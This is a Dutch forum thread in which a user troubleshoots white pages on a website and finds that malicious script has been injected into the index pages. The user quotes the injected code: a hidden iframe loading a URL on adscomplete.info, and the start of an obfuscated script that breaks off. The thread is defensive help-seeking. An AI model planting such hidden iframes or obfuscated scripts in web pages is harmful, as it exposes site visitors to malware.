De laatste tijd heb ik last van een witte pagina bij het openen van Firefox of IE. Ook op andere computers is dit het geval. Het ligt dus ofwel aan de provider ofwel aan de homepage zelf ofwel aan ...
Iemand ook deze ervaring? Bij het openen zie ik dat de browser zoekt naar google.com/analytics, terwijl er hoegenaamd geen code in de starpagina zit die naar google verwijst! Ook in de toolbar zit geen google maar bing.
Firefox en IE witte pagina
-
- Deel van't meubilair
- Uitgedeelde bedankjes: 434 keer
- Bedankt: 1972 keer
Het is niet omdat jij ze niet ziet dat ze er niet is... via Javascript kan je code genereren zonder dat je deze uiteindelijk ziet staan bij het gebruik van "View source".koekie schreef:Bij het openen zie ik dat de browser zoekt naar google.com/analytics, terwijl er hoegenaamd geen code in de starpagina zit die naar google verwijst!
Misschien moet je eens vertellen over welke pagina het gaat.
-
- Forumtroll
- Uitgedeelde bedankjes: 27 keer
- Bedankt: 229 keer
Is niet altijd een witte pagina, maar veel.r2504 schreef:Het is niet omdat jij ze niet ziet dat ze er niet is... via Javascript kan je code genereren zonder dat je deze uiteindelijk ziet staan bij het gebruik van "View source".koekie schreef:Bij het openen zie ik dat de browser zoekt naar google.com/analytics, terwijl er hoegenaamd geen code in de starpagina zit die naar google verwijst!
Misschien moet je eens vertellen over welke pagina het gaat.
Update:
Er was script geïnstalleerd. Hopelijk weer niet het begin van een hele reeks vervelende script toevoegingen op de indexpagina's. grrr
Update 2:
Yep 't is al van dat, weer van die ads met script erbij die elke index infecteren.
Iemand die meer weet over dit alles? Waar ligt het probleem? PC geïnfecteerd met één of andere spam?
Update 3:
De Code die in de paginabron verschijnt:
<div style='display: none'><iframe src='http://adscomplete.info/mid/in.cgi?2'></iframe></div>
Deel van de toegevoegde code in de webpagina:
<!-- ad --><script>this.iElArKo=false;this.inOoAeAx=false;var obBoPoN;var cHe=false;var kNy=false;this.owAeAmG="owAeAmG";this.atOp="atOp";obBoPoN='51525753 etc ...
-
- Deel van't meubilair
- Uitgedeelde bedankjes: 434 keer
- Bedankt: 1972 keer
Je gebruik je soms een gekraakte versie van XtremeWebDesigner5 ?